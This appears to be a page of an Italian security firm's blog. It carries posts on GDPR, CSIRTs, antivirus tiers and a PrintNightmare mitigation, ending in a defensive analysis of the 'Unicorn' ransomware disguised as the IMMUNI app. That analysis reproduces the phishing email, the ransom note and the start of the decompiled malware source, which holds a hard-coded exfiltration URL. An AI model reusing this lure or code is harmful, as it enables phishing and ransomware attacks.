Le pillole

Come comportarsi con le caselle email dei dipendenti cessati

Il GDPR, normativa europea sulla protezione dei dati personali, impone regole chiare per il trattamento lecito, equo e trasparente di tali informazioni. In caso di licenziamento, è essenziale che l'azienda gestisca con cura i dati personali dell'ex dipendente, conformemente alle disposizioni normative. Il GDPR specifica chiaramente che, in seguito al termine del rapporto di lavoro, non è consentito mantenere attive le caselle email dei dipendenti cessati, come ad esempio [email protected]. Il Garante della Privacy ha ribadito che la disattivazione dell'indirizzo email deve avvenire al momento della cessazione, con l'implementazione di un sistema automatico di risposta che informi i mittenti sull'inattività dell'indirizzo e fornisca alternative di contatto. È vietato il reindirizzamento automatico delle email del dipendente cessato. La normativa stabilisce un limite massimo di tre mesi per la cancellazione dell'account email, sottolineando che il mancato rispetto di tali disposizioni configura una violazione del principio di riservatezza e pertanto è considerato illecito. In caso di persistenza del comportamento scorretto da parte dell'ex datore di lavoro, il dipendente licenziato può agire legalmente, richiedendo al tribunale la chiusura dell'account email aziendale e, se applicabile, il risarcimento per eventuali danni subiti. Il lavoratore ha anche la possibilità di rivolgersi al Garante della Privacy per ottenere una condanna del datore di lavoro e assicurarsi che vengano adottate le corrette pratiche di gestione dei dati personali, come indicate dalle disposizioni normative. È importante sottolineare che apportare modifiche alle informative sulla conservazione dei dati deve avvenire nel rispetto della legge e degli orientamenti giurisprudenziali, evitando qualsiasi rettifica in contrasto con tali principi. Attenzione che mantenere una vecchia casella attiva comporta diversi diversi rischi legati alla protezione dei dati e alla prevenzione di potenziali minacce cibernetiche.
  • Conservare le mail di un dipendente licenziato può aumentare il rischio di accesso non autorizzato ai dati sensibili. La cancellazione immediata riduce questo rischio, garantendo che solo le persone autorizzate possano accedere a tali informazioni.
  • Un dipendente licenziato potrebbe diventare un potenziale rischio di minaccia interna, specialmente se si tratta di un licenziamento conflittuale. La cancellazione delle mail riduce la possibilità che l'ex dipendente utilizzi indebitamente le informazioni aziendali o partecipi a attività dannose.
  • Mantenere attive le mail di un dipendente licenziato potrebbe portare a situazioni imbarazzanti o dannose per l'immagine dell'azienda in caso di uso improprio delle comunicazioni aziendali.
  •  Le caselle email inattive possono diventare bersagli di attacchi informatici come il phishing. Cancellare le mail riduce la superficie di attacco e contribuisce a proteggere sia l'azienda che gli ex dipendenti da minacce cibernetiche.
Leggi di più...

Lo sviluppo di un software a norma gdpr

La General Data Protection Regulation (GDPR) è una normativa europea che regola la protezione dei dati personali dei cittadini dell'Unione Europea. Se stai sviluppando un software da zero e desideri assicurarti che sia conforme al GDPR, ci sono diversi aspetti che dovresti prendere in considerazione durante il processo di sviluppo. Ecco alcuni dei principali aspetti da valutare: 

 

    1. Raccolta e trattamento dei dati personali:

      - Determinare quali tipi di dati personali il software raccoglierà e come verranno trattati.

      - Assicurarsi di avere una base legale per la raccolta e il trattamento dei dati.

    2. Accesso ai dati personali:

      - Limitare l'accesso ai dati personali solo alle persone autorizzate.

      - Garantire un controllo rigoroso sull'accesso ai dati.

    3. Trasparenza e consenso:

      - Fornire informazioni chiare agli utenti su come i loro dati verranno utilizzati.

      - Chiedere il consenso esplicito degli utenti quando necessario.

    4. Diritti degli interessati:

      - Rispettare i diritti degli interessati previsti dal GDPR, come il diritto all'accesso, alla rettifica, alla cancellazione, alla portabilità dei dati e il diritto di opposizione.

    5. Sicurezza dei dati:

      - Implementare misure di sicurezza adeguate per proteggere i dati personali da perdite, furti o accessi non autorizzati Questo include la crittografia dei dati, l'accesso protetto con password e l'aggiornamento regolare del software. Prevedi inoltre di effettuare un penetration test prima di mettere in produzione il tuo software.

    6. Valutazione dell'impatto sulla protezione dei dati (DPIA):

      - Condurre una DPIA se il software comporta un rischio elevato per i diritti e le libertà delle persone.

      - Identificare e mitigare i rischi associati al trattamento dei dati.

    7. Registrazione delle attività di trattamento dei dati:

      - Tenere un registro delle attività di trattamento dei dati.

      - Documentare cosa, quando e come vengono trattati i dati personali.

    8. Design privacy-friendly:

      - Integrare la protezione dei dati nel design del software fin dall'inizio (privacy by design).

    9. Formazione del personale:

      - Assicurarsi che il personale coinvolto nel trattamento dei dati sia formato sulla GDPR e consapevole delle responsabilità.

    10. Responsabile della protezione dei dati (DPO):

      - Nominare un Responsabile della protezione dei dati (DPO) se necessario, soprattutto se il software tratta grandi quantità di dati personali.

    11. Conformità continua:

      - La conformità al GDPR richiede una revisione costante e l'adeguamento alle nuove normative o alle modifiche nel trattamento dei dati.

È importante consultare un esperto legale o un consulente sulla protezione dei dati per garantire la piena conformità al GDPR del tuo software, in quanto le esigenze possono variare in base al tipo di dati trattati e al contesto specifico del tuo software. Inoltre, la conformità al GDPR è un requisito importante per evitare sanzioni e proteggere la reputazione dell'azienda.

Contattaci per maggiori informazioni




Leggi di più...

CSIRT – L'Unità di Risposta agli Incidenti Informatici

La sicurezza informatica è una priorità per tutte le aziende, ma come si anticipano le minacce informatiche?

L'aumento dei cyber attacchi e la complessità delle minacce rendono fondamentale la creazione di un'unità specializzata per gestire tali incidenti. È qui che entra in gioco il CSIRT, il Computer Security Incident Response Team.

Dottor Marc fa parte di un gruppo di esperti chiamato Comitato Tecnico Scientifico "Compliance aziendale" di SEAC, e Enrico Marcolini e Claudio Marchesini hanno scritto un articolo per la rivista Compliance che tratta proprio di questo tema.

Creazione del CSIRT

Il CSIRT è una squadra di professionisti esperti che collaborano per prevenire, rilevare e rispondere agli incidenti informatici. Questa unità è composta da un gruppo eterogeneo di professionisti provenienti da diverse aree aziendali, inclusi esperti interni, consulenti esterni, fornitori di servizi e persino rappresentanti dei gruppi dirigenziali.

Uno dei principali obiettivi del CSIRT è sviluppare e implementare un Piano di Risposta agli Incidenti di Sicurezza. Questo piano fornisce le linee guida e le procedure necessarie per rispondere prontamente ed efficacemente agli incidenti informatici. Dal rilevamento dell'attacco alla sua gestione e risoluzione, il piano definisce i ruoli e le responsabilità di ciascun membro del CSIRT, garantendo una risposta coordinata e tempestiva.

Collaborazione tra esperti interni ed esterni

La collaborazione tra esperti interni ed esterni è essenziale per il successo del CSIRT.

Gli esperti interni, grazie alla loro familiarità con l'ambiente aziendale, possono individuare più rapidamente gli indicatori di compromissione e adottare misure adeguate per contenere l'incidente.

I consulenti esterni, con la loro competenza e esperienza nell'affrontare una vasta gamma di minacce informatiche, possono fornire un supporto prezioso nel rilevare e rispondere agli attacchi più sofisticati.

Partecipazione dei gruppi dirigenziali

La partecipazione dei gruppi dirigenziali dimostra un impegno a proteggere l'azienda e le sue risorse.

I leader aziendali comprendono l'importanza di investire nella sicurezza informatica e forniscono le risorse necessarie per supportare il lavoro del CSIRT. La loro partecipazione attiva e il sostegno alle decisioni prese dal team aiutano a creare una cultura di sicurezza all'interno dell'organizzazione.

 Prevenzione di futuri attacchi

La creazione di un CSIRT non riguarda solo la gestione degli incidenti informatici, ma anche la prevenzione di futuri attacchi.

Il team monitora costantemente le nuove minacce e le nuove tecniche utilizzate dai criminali informatici, aggiornando le misure di sicurezza e fornendo formazione e sensibilizzazione al personale aziendale.

Figure chiave all'interno del CSIRT

Nell'ambito di un'organizzazione, il CSIRT è composto da diverse figure chiave che collaborano per affrontare e rispondere agli incidenti informatici. Ognuna di queste figure svolge un ruolo cruciale nella gestione della sicurezza, della conformità e della comunicazione.

Alcune di queste figure includono:

  • CSO / CISO Leader: Il Chief Security Officer (CSO) o il Chief Information Security Officer (CISO) è il leader strategico del CSIRT.
    Questa figura sviluppa i criteri di classificazione dei rischi tecnici, operativi e finanziari, che vengono utilizzati per stabilire le priorità nel piano di risposta agli incidenti.

  • Partner tecnici: Internet Service Provider (ISP), Managed Service Provider (MSP), fornitori di hosting e partner tecnologici svolgono un ruolo fondamentale nella gestione della sicurezza informatica, collaborando con il CSIRT per implementare controlli di sicurezza volti a limitare la progressione di un attacco informatico tra sistemi e organizzazioni di terze parti.

  • Team di Risposta agli Incidenti Esterni di Terze Parti: Nel caso di incidenti informatici di particolare gravità o complessità, le organizzazioni possono fare affidamento su team di risposta agli incidenti esterni di terze parti. Questi professionisti altamente specializzati collaborano con il CSIRT interno per gestire i rischi e rispondere agli incidenti in modo tempestivo ed efficace. Questo è solitamente il ruolo ricoperto da Dottor Marc e dal suo team di professionisti della cyber security.

  • Consulenti legali: I consulenti legali sono fondamentali nella gestione degli aspetti legali e regolatori correlati agli incidenti informatici. Queste figure lavorano a stretto contatto con il CSIRT per confermare i requisiti legali relativi all'informazione dei dipendenti, dei clienti e del pubblico riguardo alle violazioni informatiche. Inoltre, si occupano della verifica con le Forze dell'Ordine locali e garantiscono che il team IT abbia l'autorità legale per il monitoraggio degli incidenti.

Supporto tecnologico

L'utilizzo di soluzioni tecnologiche avanzate può migliorare l'efficacia del CSIRT nella gestione degli incidenti informatici, consentendo una rilevazione tempestiva, una risposta coordinata e una prevenzione efficace. Tuttavia, è importante ricordare che la tecnologia da sola non può garantire la sicurezza informatica. È necessaria una combinazione di persone competenti, processi robusti e strumenti tecnologici all'avanguardia per creare un ambiente sicuro e resiliente.

Mantenere la sicurezza delle informazioni è una sfida in continua evoluzione, ma con una solida strategia, una collaborazione efficace e l'uso appropriato della tecnologia, le organizzazioni possono affrontare con successo le minacce cibernetiche e proteggere i propri dati sensibili. 

Leggi di più...

LA PIRAMIDE DEGLI ANTIVIRUS: uno sguardo sulle metodologie per contrastare o prevenire gli attacchi criminali informatici

Dottor Marc fa parte di un gruppo di esperti chiamato Comitato Tecnico Scientifico "Compliance aziendale" di SEAC. Questo comitato ha l'obiettivo di fornire supporto alle aziende e di sfruttare al massimo le opportunità offerte dalle trasformazioni in corso. Lavoriamo per aiutare le imprese a innovare digitalmente, proteggere la privacy e la sicurezza informatica, ottenere finanziamenti pubblici, gestire relazioni con le Pubbliche Amministrazioni e prevenire sanzioni legali. Ci concentriamo anche sulla sicurezza dei lavoratori, migliorare le performance organizzative e favorire un equilibrio tra vita e lavoro.

Di seguito viene citato l'articolo pubblicato sulla rivista Compliance.

È una verità universalmente riconosciuta che un virus provvisto di un ingente codice informatico debba essere in cerca di un computer da attaccare. 

Il problema è che, per quanto sia cosa nota, non tutti sembrano prendere alcun provvedimento a riguardo. 

Forse anche voi in questo momento state leggendo questo articolo da un computer che considerate sicuro, ma che in realtà non è provvisto nemmeno di un antivirus.  

Dal 2020 in poi i sistemi operativi sono messi costantemente a dura prova, ma nessuno sembra notarlo. O a nessuno sembra importare. 

La pandemia e il conseguente lockdown spinsero allo smart working, ma le aziende non fornirono protezioni adeguate a questo cambiamento: spesso gli accessi agli account aziendali vennero fatti con i pc di casa, abbandonando a loro stessi i dati sensibili aziendali. 

Questo è un dato di fatto: secondo il Rapporto Clusit 2021 sulla sicurezza ICT in Italia, gli attacchi informatici gravi nel 2020 aumentarono del 66% rispetto al 2017, il 12% rispetto al 2019.

Gli attacchi informatici non risparmiano nessuno, dal singolo utente alle grandi aziende, dagli enti pubblici, alla sanità. È diventato noto il recente caso dell’ASST Fatebenefratelli Sacco di Milano, i cui sistemi gestionali informatici, lo scorso anno,  furono resi indisponibili a causa di un attacco del gruppo criminale informatico Vice Society. Questo gruppo è noto per l’uso di un software malevolo che è in grado di cifrare i dati aziendali rendendoli inutilizzabili. Dopo di che proseguì alla pubblicazione online di tutto ciò su cui riuscì a mettere mano, cartelle cliniche, cure e altre informazioni altamente sensibili. Per quanto la chiamata alla Polizia Postale fu abbastanza tempestiva, ormai il danno era fatto e non senza causare problemi anche al personale sanitario, che fu costretto a tornare a utilizzare carta e penna perché il gestionale era inaccessibile. 

Il nostro Paese è sempre stato in difficoltà nel volteggiare in questo valzer che è il progresso tecnologico e questo è un problema perché, con esso, si evolvono anche le minacce. Il più grande errore che una persona provvista di giudizio può fare, è non considerarsi come una potenziale vittima di attacchi informatici. 

Esistono diversi metodi per evitare di caderne vittima.  La chiave di tutto è la gestione e il controllo dei dati, ed è una questione di cui chiunque può occuparsi, se solo si volesse. Ma è necessaria una presa di posizione concreta.  Come fare? Il punto di partenza è l’installazione di un buon antivirus.  

Le minacce

Un tempo i virus erano un mero divertimento per i criminali, un modo per passare il tempo, fare qualche scherzo, poco più che cambiare lo sfondo del pc o distruggere i  dati di qualche malcapitato senza un fine criminale. 

Ma da quando i dati sono diventati una vera e propria moneta di scambio, anche i criminali sono diventati più motivati e aggressivi. Molti virus sono creati a tavolino per accedere ai dati tramite vulnerabilità comuni o convincendo l’utente a compiere operazioni avventate, per poi chiedere un qualche tipo di riscatto. 

Questo tipo di virus è detto ransomware, ed è una tipologia di malware (abbreviazione di malicious software, software malevolo) molto comune al giorno d’oggi: cripta i file presenti nel pc, li rende illeggibili e chiede dei soldi in cambio di un codice per decriptarli. Spesso semplicemente minaccia di vendere o rendere pubblico qualsiasi dato o foto che ha trovato nel pc. 

Le minacce informatiche non si limitano infatti solo ai virus: con l’avvento e l’espansione dell’Internet of Things, ovvero di oggetti in grado di connettersi a una rete per elaborare dati e scambiare informazioni con altri oggetti, più comunemente noti come “oggetti smart”, l’area di espansione delle minacce informatiche si è notevolmente ampliata a tal punto che qualsiasi oggetto potrebbe potenzialmente essere soggetto a un attacco criminale. 

Per questo motivo si parla di rilevamento di minacce su più dispositivi, avere un buon antivirus solo nel pc di casa non è più sufficiente per far fronte a questi pericoli. 

Se le aree di attacco sono aumentate, ne consegue che lo siano anche i metodi di approccio usati dai virus, tanto è vero che non si parla più solo di virus. 

Alla lista dei nemici conviene aggiungere, oltre ai malware, anche lo spyware e il phishing. 

Lo spyware è un tipo di malware, ma più subdolo: si nasconde nell’ombra del sistema operativo del dispositivo dell'utente e apporta cambiamenti non voluti; può spiarne l’attività online, generare pubblicità indesiderata o mostrare ricerche o siti web ma visti. 

Il phishing usa invece un sistema di mail o messaggi fraudolenti che spingono affinché l’utente possa fornire informazioni o dati privati, spesso anche solo aprire un link o un allegato di una mail potrebbe essere rischioso. 

Insomma, se mentre navigate vi appare un banner con su scritto che avete vinto un iPhone 13, sappiate che non è vero. 

Ci dispiace distruggere i vostri sogni, ma ora dobbiamo andare avanti. 

Evitiamo l’approfondimento  su Worms, Trojans e Spam solo per non farvi perdere quel briciolo di fiducia nell’umanità che vi è rimasta. 

Ad ogni modo, parallelamente ai diversi tipi di minacce, esistono anche diversi tipi di antivirus. 

Gli antivirus

Gli antivirus sono software appositamente creati per cercare, rilevare e infine eliminare virus o altre minacce dai dispositivi. 

Esistono diversi metodi di classificazione, una delle opzioni è quella di dividerli in base alle metodologie utilizzate per rilevare ed eliminare le infezioni. 

Seguiranno le tre metodologie principali, anche se, a onor del vero, un antivirus professionale  è in grado di ottenere il meglio dalla combinazione tra le tre. 

  1. Malware signature antivirus

Il primo metodo consiste nell’individuazione di una minaccia malware basata sulla “firma” della detta minaccia. 

Prevede un confronto del codice di un file sospetto con un database di “firme” di malware già note. Ogni malware infatti lascia una traccia  nel dispositivo, una sorta di “impronta digitale” che può essere schedata in questo database. L’antivirus lo rileverà e lo eliminerà in automatico. Questo metodo da solo è però alquanto limitante, dato che, basandosi su un confronto da un database,  consente esclusivamente il rilevamento di malware già noti. 

  1. System monitoring antivirus

Questi tipi di antivirus utilizzano un approccio basato sul comportamento di un dato file sconosciuto piuttosto che sul confronto di firme note. Il loro metodo consiste nel mettere in guardia l’utente da eventuali movimenti sospetti, ad esempio se si connette a un sito sconosciuto o se un programma inizia a modificare le impostazioni del sistema. In questi casi l’antivirus segnalerà il file come sospetto. Una pecca non di poco conto di questo sistema è il fatto che spesso anche file totalmente innocui, vengono etichettati come potenzialmente pericolosi.

  1. Machine learning antivirus

È l’ultima frontiera della tecnologia antivirus, consente di rilevare il malware attraverso l'apprendimento automatico. Utilizza e analizza enormi set di dati per rilevare la presenza di malware. Le firme rivestono comunque un’enorme importanza, in quanto sono fondamentali perché il sistema sia sempre aggiornato sulla scoperta di nuovi virus.

La piramide degli antivirus secondo Dottor Marc

La protezione dei dati informatici è una faccenda che va presa seriamente, bisogna essere meticolosi e organizzati, al limite del paranoico. Meglio prendere qualche precauzione in più piuttosto che ritrovarsi da un giorno all’altro con le informazioni personali vendute all’asta sul Dark Web. 

Se vi abbiamo fatto venire anche solo un po’ di ansia, bene, significa che siete persone giudiziose.  Se volete sapere se i vostri dati sono abbastanza protetti, non vi resta che continuare a leggere. 

Noi di Dottor Marc abbiamo infatti inventato un metodo che permette di stabilire i gradi di efficacia delle diverse tipologie di antivirus. 

Questo nostro metodo si basa su un sistema a base piramidale: si parte dalla base, per arrivare fino alla cima, la punta della piramide, la massima aspirazione di protezione di ogni utente. 

Ma partiamo dalla base della nostra piramide, un primo gradino su cui mai si dovrebbe rimanere: un computer senza un antivirus. Esistono molte opzioni gratuite e a pagamento disponibili sul mercato, quindi non c'è alcun motivo per non utilizzarne uno. Perché un PC senza antivirus è un invito a rubare i vostri dati personali, il vostro denaro e la vostra privacy. È tempo di smettere di giocare con il fuoco e proteggere il vostro sistema. Non siate delle vittime facili, scaricate subito un antivirus affidabile.

Se state continuando a leggere ci auguriamo che abbiate colto il nostro caldo suggerimento e siate pronti per il secondo gradino della nostra piramide: l’antivirus di default del vostro sistema operativo. 

Gli antivirus di default inclusi in sistemi operativi o produttori di hardware possono essere limitati nella loro capacità di rilevare e prevenire minacce di sicurezza, in particolare malware avanzato. Inoltre, la protezione è scarna per il semplice motivo che chi programma i virus sa benissimo come eludere le protezioni più utilizzate. Possono inoltre essere privi di funzionalità aggiuntive come il firewall, la protezione della privacy, la gestione delle password, la protezione delle email e altre opzioni di sicurezza avanzate. 

Il terzo livello della nostra scala verso la perfezione è occupato dall’ antivirus gratuito. Bene che vi siate presi la briga di scaricarlo, ma ha molti difetti. 

Iniziamo dai pregi: innanzitutto quello più palese, ovvero il fatto che sia gratuito, se volete risparmiare sicuramente è un vantaggio; offre una protezione base, che non è male per alcuni utenti non particolarmente esigenti; presentano spesso un’interfaccia user-friendly, ovvero è molto semplice e intuitivo imparare a utilizzarli. 

I difetti non riguardano solo i problemi di sicurezza, ma metteranno alla prova la vostra pazienza. 

Il problema è che la maggior parte di questi antivirus sono versioni di prova, più interessate a vendere il pacchetto a pagamento che  effettivamente proteggere il vostro dispositivo. Sarete sommersi da continue e insistenti notifiche e la salute del vostro computer sarà a rischio, ma solo perché non riuscirete a trattenervi dal gettarlo a terra. 

Se, invece, vi va bene, finirete semplicemente per ignorare queste notifiche, ma così facendo vi perderete anche eventuali avvisi di qualche problema più serio. Inoltre, molte funzionalità sono disponibili solo nella versione a pagamento, dunque avrete solo una falsa e blanda percezione della sicurezza. 

Con il quarto livello, ci avviciniamo alla soluzione ideale, si tratta di un antivirus a pagamento. Niente versioni di prova, niente notifiche insistenti o servizi a metà. Un antivirus a pagamento fornisce maggiore protezione rispetto a quello gratuito, comprese funzioni avanzate come la protezione in tempo reale, la navigazione sicura, la scansione programmata, la protezione della rete e la crittografia dei file. Offre inoltre aggiornamenti costanti per garantire la sicurezza contro le minacce online in evoluzione. Investire in un antivirus a pagamento può aiutare a prevenire perdite finanziarie e a proteggere la privacy e i dati sensibili.

Non esiste una marca ideale, ogni antivirus ha i suoi pro e i suoi contro, bisogna saper ponderare bene la propria scelta perché si tratta di affidare i tuoi dati più sensibili a un sistema, e quindi deve essere perfetto. 

Così si arriva all’ultimo livello, la cima della nostra piramide, da cui si gode di un meraviglioso panorama all’insegna della sicurezza informatica: un antivirus gestito. 

 Un antivirus gestito rappresenta una soluzione di sicurezza informatica di altissimo livello, che offre una protezione completa e affidabile contro le minacce online in continua evoluzione. Con un team di esperti che monitora costantemente la sicurezza, le minacce verranno individuate e neutralizzate rapidamente, senza alcun intervento manuale da parte dell'utente.

Inoltre, un antivirus gestito fornisce una maggiore visibilità sulla sicurezza della rete, con report e analisi dettagliate su eventuali minacce e vulnerabilità, permettendo di prendere decisioni ponderate per migliorare la sicurezza e prevenire futuri attacchi. 

La configurazione e la manutenzione del software sono gestite da uno o più tecnici informatici, che faranno tutto il lavoro più complicato al posto vostro, senza preoccupazioni e con la certezza di un lavoro ben fatto. Lasciare che sia l’antivirus a gestire ogni impostazione o lasciare le impostazioni predefinite  non è l’opzione ideale, è necessario pianificare e impostare le specifiche scansioni, la risoluzione delle minacce e verificare anche che le notifiche non siano troppo insistenti. 

È importante sottolineare che affidarsi a soluzioni gratuite o autoprodotte può rappresentare un grave rischio per la sicurezza informatica. La scelta di un antivirus gestito garantisce una protezione senza compromessi e un supporto affidabile duraturo nel tempo. 

Inoltre, sono davvero tanti gli antivirus tra cui scegliere, e può risultare difficile destreggiarsi tra le varie offerte, soprattutto se non si è esperti del settore e si è quindi inconsapevoli su quali siano le reali esigenze dei dispositivi. 

È necessario, però, verificare la reputazione e la credibilità del fornitore di antivirus gestito, poiché la sicurezza del sistema dipende interamente dalla loro competenza e affidabilità. È bene anche eseguire una valutazione attenta delle esigenze e del budget che si intende investire in questa tipologia di antivirus. Nel caso ve lo chiedeste anche noi di Dottor Marc offriamo questo tipo di servizio e, se vi va, potete consultare il nostro sito per ulteriori informazioni. 

Sull’educazione informatica e le normative

Esistono anche altre altre armi contro i criminali informatici, che vanno oltre l’installazione di un sistema di antivirus e che dovrebbero essere la base per una società più attiva e consapevole dal punto di vista tecnologico. 

Una è la gestione della normativa e delle leggi, l’altra riguarda l’educazione informatica. 

Le normative europee sulla sicurezza informatica, come il Regolamento Generale sulla Protezione dei Dati (RGPD), stabiliscono obblighi per le organizzazioni per garantire la protezione dei dati personali dei cittadini dell'UE. 

Questi obblighi includono la nomina di un responsabile per la protezione dei dati, la valutazione del rischio, l’ implementazione di misure di sicurezza adeguate e la notifica delle violazioni dei dati. Inoltre, le organizzazioni devono garantire la trasparenza nella raccolta e nell'utilizzo dei dati, fornire agli individui il controllo sui loro dati personali e garantire la sicurezza dei dati durante la loro trasmissione e archiviazione. Le sanzioni per la violazione delle normative sulla privacy possono essere elevate e includono multe e danni alla reputazione.

Le leggi sono alla base di una società civilizzata, senza di esse non c’è possibilità di evoluzione, soprattutto se queste vanno a intaccare un aspetto in continua progressione come lo è il digitale. 

Un altro elemento fondamentale per la progressione tecnologica è l’educazione informatica che va a stretto contatto con le competenze digitali che una persona possiede e dunque con l'uso consapevole  dei dispositivi. Passiamo ad analizzare la comunità degli individui nella sua generalità in base a queste competenze, così facendo emergeranno delle questioni interessanti che ci offriranno un quadro completo e realistico della situazione attuale. 

La Commissione Europea ogni anno stila una lista di paesi con più competenze digitali. Si tratta del rapporto DESI, che dal 2014 monitora e classifica il livello di digitalizzazione dei diversi paesi dell’unione europea. Il 2020 fu, come si sa, un punto di svolta, perché si è evidenziato un miglioramento più o meno omogeneo nell’adozione di servizi digitali da parte di cittadini e imprese. Questo è evidente se si guardano le percentuali di interazioni digitali nel 2019 e 2020: 32% contro il 55% di giugno 2020. Questo è un dato importante, che ha portato ad un incremento  di ben 1 milione di lavoratori nel settore ICT, una crescita di servizi digitali. Inoltre l’uso del Cloud è aumentato esponenzialmente dal 24% al 41%. 

Secondo il rapporto DESI 2022  l’Italia è il paese che, dal 2017 al 2022, ha avuto la crescita maggiore. L’altra faccia della medaglia è, però, che il nostro Paese si colloca al 18° posto su 27. L’indice DESI, nel suo calcolo, tiene conto di diversi fattori, come competenze, accesso e adozione di tecnologie all’avanguardia. 

Nonostante un aumento delle competenze digitali di base, più della metà della popolazione italiana ne è ancora priva, probabilmente a causa dell'elevata percentuale di anziani nel nostro profilo demografico. Mentre il 71% dei giovani tra i 16 e i 24 anni in Europa possiede queste competenze, degli over 65-74 solo il 25%. 

L’aumento delle competenze digitali di un paese  è fondamentale per il progresso tecnologico: una buona educazione informatica aumenta la consapevolezza degli utenti sui rischi e pericoli online, riducendo gli attacchi criminali e la diffusione dei virus.  Abbiamo fatto dei progressi dal 2020 in poi, ma ancora non è abbastanza. 

Leggi di più...

Printer Nightmare Patch, come mitigare il problema applicando un fix via Group Policy ed una policy sul Firewall

Cos'è questa nuova vulnerabilità?

Benjamin Delpy, ricercatore di sicurezza e creatore di Mimikatz, ha affermato di aver trovato un modo per abusare del normale metodo di installazione dei driver di stampa di Windows per ottenere privilegi di SISTEMA locale tramite driver di stampante dannosi.

 

 

 

 

 

 

1 - Mitigare il problema tramite GPO

Vai sul controller di dominio ed imposta la policy così:

 

Computer Configuration > Administrative Templates > Printers

Doppio click su Point and Print Restrictions policy.

Seleziona Enabled
Sulle Opzioni seleziona Show warning and elevation prompt option per entrambe le checkbox


Clicca su Ok ed attenti la propagazione della GPO

2 - Aggiungere un'ulteriore blocco tramite policy sul Firewall

In una nota Microsoft consiglia, se non prettamente necessario per l'operatività aziendale, di bloccare in uscita la porta 139 e 445 per limitare al massimo le possibilità di sfruttare questa vulnerabilità.

 

Ora bisogna aspettare un fix da parte di Microsoft che speriamo arrivi al più presto.

Leggi di più...

Farmacie sotto attacco: IMMUNI diventa un virus che cripta i file

Un nuovo ransomware minaccia le farmacie e le attività che lavorano in ambito medico. Sicuramente di origine italiana questo virus rischia di mettere in ginocchio le attività in tutta la nazione.

Gli esperti di cyber security di Dottor Marc hanno ricevuto una segnalazione di un nuovo attacco ransomware che potrebbe aver preso di mira le farmacie, utilizzando un mix di tecniche di ingegneria sociale e criptazione per bloccare le attività commerciali in ambito medico.

Denominato Unicorn Ransomware, questo nuovo virus cerca di convincere l'utente a scaricare un file eseguibile e avviarlo sul proprio computer, con la promessa di offrire il versione beta l'app IMMUNI e "avere dati di prima mano aggiornati in tempo reale inerenti le situazioni di contagio sul vostro territorio".

Per aumentare la veridicità del messaggio il mittente sembra essere FEDERAZIONE ORDINI FARMACISTI ITALIANI ma come si può notare il dominio internet dei collegamenti all'interno del messaggio non è fofi.it bensì fofl.it

La letterà I è stata sostituita con la lettera L e potrebbe trarre in inganno molte persone.

Il testo dell'email inviata dai criminali è questo:

2020-05-22 COVID-19 – ANTEPRIMA NUOVA APP PER PC FISSI E PORTATILI PER MONITORARE GLI SPOSTAMENTI DEGLI INFETTI DA COVID-19


Per far fronte all'attuale emergenza sanitaria correlata alla riapertura delle attività nel nostro territorio e alla conseguente necessità di ridurre i contatti tra le persone, per contrastare e contenere il diffondersi del Covid-19, si anticipa, tramite invio di una “beta release” a tutte le farmacie, parafarmacie, università, medici condotti ed enti coinvolti nell’emergenza di sanità pubblica, la prima versione per pc dell’app IMMUNI.
Questa versione potenziata, dedicata esclusivamente agli operatori sul campo, vi metterà in condizione di avere dati di prima mano aggiornati in tempo reale inerenti le situazioni di contagio sul vostro territorio. I dati vengono immediatamente condivisi dai server della Protezione Civile su tutti gli altri dispositivi connessi in streaming.
Avere un monitoraggio efficace e capillare sul territorio, sarà la chiave vincente per evitare una disastrosa seconda ondata di diffusione del virus.

Di seguito trovate il link per scaricare il file eseguibile da installare sul vostro pc.

Clicca su questo link per scaricare il file eseguibile dal sito della Federazione
hxxps://www.fofl.it/IMMUNI.exe

Clicca su questo link per scaricare il file .rar dal sito della federazione
hxxps://www.fofl.it/IMMUNI.rar


FEDERAZIONE ORDINI FARMACISTI ITALIANI
Via Palestro, 75 - 00185 Roma
www.fo fl.it
tel. 06.4450361
[email protected]
Supporto tecnico per il sito www.fo fl.it : supporto_tecnico@ fofl.it
Ufficio stampa: ufficiostampa@ fo fi.it
Capo Ufficio stampa: Maurizio Imperiali
tel: 334/6068949

Ransomware IMMUNI: comportamento e conseguenze dell'infezione

Il programma che viene suggerito ai malcapitati si chiama IMMUNI.exe e si mostra con un'icona che ricorda il virus che tanto abbiamo imparato a conoscere negli ultimi mesi.

Analizzando il virus sono stati rilevati e catalogati i comportamenti del ransomware in un ambiente di prova.
Il virus una volta eseguito mostra una schermata volta a disorientare l'utente, una falsa mappa dei contagi a livello globale.

Virus Unicorn: la mappa dei contagi

Mentre l'utente è attratto da questa schermata il virus agisce in maniera silenziosa bloccando il computer, criptando i file e aggiungendo l'estensione .fuckunicornhtrhrtjrjy

La richiesta di riscatto, rilasciata a seguito della criptazione recita:

La lunga serpe sul bastone di Asceplio si è ribellata, ed una nuova era sta per sopraggiungere!
Questa è la vostra possibilità per redimervi dopo anni di peccati e soprusi.
Sta a voi scegliere. Entro 3 giorni il pegno pagare dovrai o il fuoco di Prometeo cancellerà
i vostri dati così come ha cancellato il potere degli Dei sugli uomini.  Il pegno è di solamente 300 euros, da pagare
con i Bitcoin al seguente indirizzo : 195naAM74WpLtGHsKp9azSsXWmBCaDscxJ dopo che pagato avrai, 
una email mandarci dovrai. [email protected] il codice di transazione sarà la prova.
Dopo il pegno pagato riceverai la soluzione per spegnere il fuoco di Prometeo. Andare dalla 
polizia o chiamare tecnici a niente servirà, nessun essere umano aiutarti potrà.

Nel frattempo anche lo sfondo del PC viene modificato con questa immagine.

Approfondendo l'analisi tecnica i nostri esperti hanno rilevato alcune interessanti informazioni.

IMMUNI.exe : decompilazione e analisi

Questo il codice sorgente:

// Decompiled with JetBrains decompiler
// Type: fuckunicorn.Form1
// Assembly: IMMUNI, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8F54C700-FA0D-46F7-BC53-7208912E7089
// Assembly location: C:\Users\Administrator\Downloads\IMMUNI.exe
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;
namespace fuckunicorn
{
public class Form1 : Form
{
private string targetURL = "http://116.203.210.127/write.php";
private string userName = Environment.UserName;
private string computerName = Environment.MachineName.ToString();
private string userDir = "C:\";
private string backgroundImageUrl = "https://i.imgur.com/6bDNKfs.jpg";
private IContainer components;
private PictureBox pictureBox1;
private Button button1;
